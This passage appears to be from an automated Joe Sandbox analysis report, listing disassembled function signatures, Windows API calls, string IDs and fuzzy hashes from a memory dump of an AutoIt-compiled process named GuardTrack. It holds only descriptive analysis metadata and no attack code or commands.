                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00636FD6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: LengthMessageSendTextWindow
                                                          • String ID: edit
                                                          • API String ID: 2978978980-2167791130
                                                          • Opcode ID: 144633d4e2c4793959c25ccf1852a5989c751b26da93214f6bc685b94d42bc82
                                                          • Instruction ID: d2d68e22bfef8d7c8cf09b6e082e55e26c84781861f13a144e91011e59f99f85
                                                          • Opcode Fuzzy Hash: 144633d4e2c4793959c25ccf1852a5989c751b26da93214f6bc685b94d42bc82
                                                          • Instruction Fuzzy Hash: 1B114F71500209BFEB105E64EC84EFB3B6BEB45368F109718FA65972E0C775DC919BA0
                                                          APIs
                                                          • _memset.LIBCMT ref: 006131C9
                                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 006131E8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: InfoItemMenu_memset
                                                          • String ID: 0
                                                          • API String ID: 2223754486-4108050209
                                                          • Opcode ID: 5f8bc4f08135ba20c693978b72db91976aa4c525fc91fae572a24439b0d79b59
                                                          • Instruction ID: 13b5d6f297b6ed4ae113efdf788c3426a126b62e0a458e58efde0a243744cbff
                                                          • Opcode Fuzzy Hash: 5f8bc4f08135ba20c693978b72db91976aa4c525fc91fae572a24439b0d79b59
                                                          • Instruction Fuzzy Hash: 4711D036901135BBEB24DA98DC46BDD77BEAB05310F184122E817A73A0D770AF89CB91
                                                          APIs
                                                          • DeleteObject.GDI32(?), ref: 005B351D
                                                          • DestroyWindow.USER32(?,?,005C4E61), ref: 005B3576
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: DeleteDestroyObjectWindow
                                                          • String ID: hd
                                                          • API String ID: 2587070983-580410754
                                                          • Opcode ID: ff5fbb1078b304250ab6c0b9d54877d716f7919af1e63b07580cefaf5e6dd668
                                                          • Instruction ID: dbed98d38defad2be9f2c445dfe45021c9b125af5d9e2d11565776ddd29aa53c
                                                          • Opcode Fuzzy Hash: ff5fbb1078b304250ab6c0b9d54877d716f7919af1e63b07580cefaf5e6dd668
                                                          • Instruction Fuzzy Hash: C1214F34609611CFDB2CDF28D858BA93BE6BB44310B14656CE80A972A0DB30FE80DB56
                                                          APIs
                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 006228F8
                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00622921
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Internet$OpenOption
                                                          • String ID: <local>
                                                          • API String ID: 942729171-4266983199
                                                          • Opcode ID: fd7068488a02ec77c58f7038d95be23317a496ee7cde3c021b7851cb1eb5107f
                                                          • Instruction ID: f47beef33cecca19264442cdbc50f772fcb9d7ad5be3c321991bcdc77779df9e
                                                          • Opcode Fuzzy Hash: fd7068488a02ec77c58f7038d95be23317a496ee7cde3c021b7851cb1eb5107f
                                                          • Instruction Fuzzy Hash: A911E370501A36BAEB248F519C98EF7FB6EFF16750F10422AF90542100E3749899DAE0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp
                                                          • String ID: 0.0.0.0$L,d
                                                          • API String ID: 856254489-3245245077
                                                          • Opcode ID: 07fa93e5942d945555ca4fdcfa236fd3c0e0be22ba6e4951765d368638e722d0
                                                          • Instruction ID: d3078692fbb4bcb88aea1b8640a9df0c50cc07af1d0c8bdf232ef7742867c83a
                                                          • Opcode Fuzzy Hash: 07fa93e5942d945555ca4fdcfa236fd3c0e0be22ba6e4951765d368638e722d0
                                                          • Instruction Fuzzy Hash: 0A118235600215AFCB14EE54C982EEAB7B6BF84710F548059F9096B3A2DA30FD82CB65
                                                          APIs
                                                            • Part of subcall function 006286E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0062849D,?,00000000,?,?), ref: 006286F7
                                                          • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006284A0
                                                          • htons.WSOCK32(00000000,?,00000000), ref: 006284DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWidehtonsinet_addr
                                                          • String ID: 255.255.255.255
                                                          • API String ID: 2496851823-2422070025
                                                          • Opcode ID: 05ed09d56fbaa5e261895d9683e525ffd5348cd0598de7a02f15beb3a3018502
                                                          • Instruction ID: 2e32de217bc7a3451ee100e3d84d27b103b8e487e2502270a779aa6f86889613
                                                          • Opcode Fuzzy Hash: 05ed09d56fbaa5e261895d9683e525ffd5348cd0598de7a02f15beb3a3018502
                                                          • Instruction Fuzzy Hash: 0211E535240226AFDB10EF64DC46FEEB766FF01310F10451AFA11972D2DB71A814CB99
                                                          APIs
                                                            • Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77
                                                            • Part of subcall function 0060B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0060B7BD
                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00609A2B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: b6546b509791629af1c1766ed57540b5fc6cd846c58a4268a03a48de072250fa
                                                          • Instruction ID: 4123909420a9dba4dac06e330e36d4dbd42caa45ece1daf088ad99e96396af9f
                                                          • Opcode Fuzzy Hash: b6546b509791629af1c1766ed57540b5fc6cd846c58a4268a03a48de072250fa
                                                          • Instruction Fuzzy Hash: 4001B571A82125ABCB18EBA4CC55DFF776BFF96360B10061DF862573D2DE315C089660
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 005BBC07
                                                            • Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B
                                                          • _wcscat.LIBCMT ref: 005F3593
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: FullNamePath_memmove_wcscat
                                                          • String ID: sg
                                                          • API String ID: 257928180-871713362
                                                          • Opcode ID: a29e69aa9c59c56aea6829181de81587456782aa2c0426acf8928ee2db2ba53d
                                                          • Instruction ID: e7c3bad915fa76761bfcd04b330fa1c28c1e46fa14c9754e7bc95d000419edf4
                                                          • Opcode Fuzzy Hash: a29e69aa9c59c56aea6829181de81587456782aa2c0426acf8928ee2db2ba53d
                                                          • Instruction Fuzzy Hash: 8311083090420A9BCB01EFA48846ECD7FB9FF49350F1044AAB949D7291DFF0AB845B51
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: __fread_nolock_memmove
                                                          • String ID: EA06
                                                          • API String ID: 1988441806-3962188686
                                                          • Opcode ID: d5619dbebed38e83f686ffabab497e561488eab5cdafa5ba2abdc20a8583d848
                                                          • Instruction ID: 81e0efef56aa63fdc2f32af9f194b2a411663516e05f2cdcbbce29fb5fa612b8
                                                          • Opcode Fuzzy Hash: d5619dbebed38e83f686ffabab497e561488eab5cdafa5ba2abdc20a8583d848
                                                          • Instruction Fuzzy Hash: 1F01B972904258BEDB28C6A8C85AEFEBBF89B15301F04429FF552D2281E575A6449760
                                                          APIs
                                                            • Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77
                                                            • Part of subcall function 0060B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0060B7BD
                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00609923
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: 497f904b86719a2bcdb20f757936b5ddbe193170584204b02544cbf21a0923ce
                                                          • Instruction ID: 88523b7584797fa008d46c0ebea4ce4f04f7be034008fd48ed0cbfa1e2b90760
                                                          • Opcode Fuzzy Hash: 497f904b86719a2bcdb20f757936b5ddbe193170584204b02544cbf21a0923ce
                                                          • Instruction Fuzzy Hash: FD01F772A821056BCB18EBE0C956EFF77AFEF52340F14001DB806632D2DA109E0896B5
                                                          APIs
                                                            • Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77
                                                            • Part of subcall function 0060B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0060B7BD
                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 006099A6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: 1e0891398fff5baa9556b1ad2436f982b7e04a575fdc51b3cdcb7ff98c72d661
                                                          • Instruction ID: c18a83fc6825ce5e4e507453c030e0929c1fba1292025678ff7b78725fd086b4
                                                          • Opcode Fuzzy Hash: 1e0891398fff5baa9556b1ad2436f982b7e04a575fdc51b3cdcb7ff98c72d661
                                                          • Instruction Fuzzy Hash: F401F772A821056ACB14EBE4CA06FFF77AF9F12340F14001DB846732C2DA209E0896B5
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: __calloc_crt
                                                          • String ID: @bg
                                                          • API String ID: 3494438863-197568780
                                                          • Opcode ID: a40029320c744d9f5ae987faa51ae5da1e65b9a324896deb32a58a797e2dd179
                                                          • Instruction ID: a066ceae503c74f1934efc44770db6ff3a7d6606caa07a94384c28d66bd16f47
                                                          • Opcode Fuzzy Hash: a40029320c744d9f5ae987faa51ae5da1e65b9a324896deb32a58a797e2dd179
                                                          • Instruction Fuzzy Hash: 7DF03C713082128FF738AF2CBC016A52FA7F740720B106467F128CA396E7308DC25690
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp
                                                          • String ID: #32770
                                                          • API String ID: 2292705959-463685578
                                                          • Opcode ID: 976b434f0b9b098c091f01b03f1f70f29fa5da1c048cf8b1c8fb9c2b5c1b43b2
                                                          • Instruction ID: daa4e7003eb3f71b7dbb20829ead8dd428c1097312412f341a08ed1e34449ed2
                                                          • Opcode Fuzzy Hash: 976b434f0b9b098c091f01b03f1f70f29fa5da1c048cf8b1c8fb9c2b5c1b43b2
                                                          • Instruction Fuzzy Hash: D7E061725002296BE3209A59AC09FE7FBEDEB45730F001017FD04D3151E5709A4087E1
                                                          APIs
                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 006088A0
                                                            • Part of subcall function 005D3588: _doexit.LIBCMT ref: 005D3592
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Message_doexit
                                                          • String ID: AutoIt$Error allocating memory.
                                                          • API String ID: 1993061046-4017498283
                                                          • Opcode ID: 82431325fec3935771a938c53c3ea2fc2ef36f4507b216aa5a99e6169e331bd2
                                                          • Instruction ID: dfd24bc0b79f2417672ee09dfc55490be3f8809dc7b5fa681e41416585f965cf
                                                          • Opcode Fuzzy Hash: 82431325fec3935771a938c53c3ea2fc2ef36f4507b216aa5a99e6169e331bd2
                                                          • Instruction Fuzzy Hash: F9D0C23128032836D32432E86C1EFCA2E898B45B51F00442BBB08A52C349E185804196
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?), ref: 005F0091
                                                            • Part of subcall function 0062C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,005F027A,?), ref: 0062C6E7
                                                            • Part of subcall function 0062C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0062C6F9
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 005F0289
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                          • String ID: WIN_XPe
                                                          • API String ID: 582185067-3257408948
                                                          • Opcode ID: 38b64e382a6deee22c7ad8402a7f2eec78fdbb01e5b95347820518d26b57871f
                                                          • Instruction ID: a4e4a8fc209cc14234df4437f07ac1b7f3a26745c48b9d41a308d13abe65787d
                                                          • Opcode Fuzzy Hash: 38b64e382a6deee22c7ad8402a7f2eec78fdbb01e5b95347820518d26b57871f
                                                          • Instruction Fuzzy Hash: D5F01C70805119DFDB25DBA0C9487EC7ABDBB08300F682485E206A2191CB744F80DF20
                                                          APIs
                                                          • DestroyIcon.USER32(,zg0zg,00677A2C,00677890,?,005C5A53,00677A2C,00677A30,?,00000004), ref: 005C5823
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: DestroyIcon
                                                          • String ID: ,zg0zg$SZ\,zg0zg
                                                          • API String ID: 1234817797-241477352
                                                          • Opcode ID: 8d3c695ae3878da2db7fa1d5a27431494b4ac05c6baeaee8680056a61c6917c1
                                                          • Instruction ID: d5e7bc635ce61b030b12c2964b82824af38e9aa139c0d23732cdf50b6583fb10
                                                          • Opcode Fuzzy Hash: 8d3c695ae3878da2db7fa1d5a27431494b4ac05c6baeaee8680056a61c6917c1
                                                          • Instruction Fuzzy Hash: 13E0C232014206EFE7200FC8D800B96FFE8BF25321F34841AE08056050E3B178E0DB90
                                                          APIs
                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00619EB5
                                                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00619ECC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Temp$FileNamePath
                                                          • String ID: aut
                                                          • API String ID: 3285503233-3010740371
                                                          • Opcode ID: 15c9d42e0f03ba80d23fe90e1e5ff89be8831d52088aed2ed8b4cb28cf52c621
                                                          • Instruction ID: df39f17ff42c5b8f18411db5e18d975b18ac74145c907a0ea89745cf79ea6334
                                                          • Opcode Fuzzy Hash: 15c9d42e0f03ba80d23fe90e1e5ff89be8831d52088aed2ed8b4cb28cf52c621
                                                          • Instruction Fuzzy Hash: 8CD05E7954031DBBEB50AB90DC0EFDBBB6DDB04700F0042A1BF58910E2DAB056988B91
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00635FEB
                                                          • PostMessageW.USER32(00000000), ref: 00635FF2
                                                            • Part of subcall function 006157FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00615877
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: 0f36a4efdea83228888532494cbdc7f64985cd5dcc415998afadbb619f251719
                                                          • Instruction ID: 218d9f3f2ce04d579510532dc569824bbc25122aa1587fee071b0add025dee75
                                                          • Opcode Fuzzy Hash: 0f36a4efdea83228888532494cbdc7f64985cd5dcc415998afadbb619f251719
                                                          • Instruction Fuzzy Hash: 16D0C936381321FAF768A7709C4BFD6AA16AB46B50F051829B366EA1D0C9F068508698
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00635FAB
                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00635FBE
                                                            • Part of subcall function 006157FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00615877
                                                          Strings
                                                          Memory Dump Source
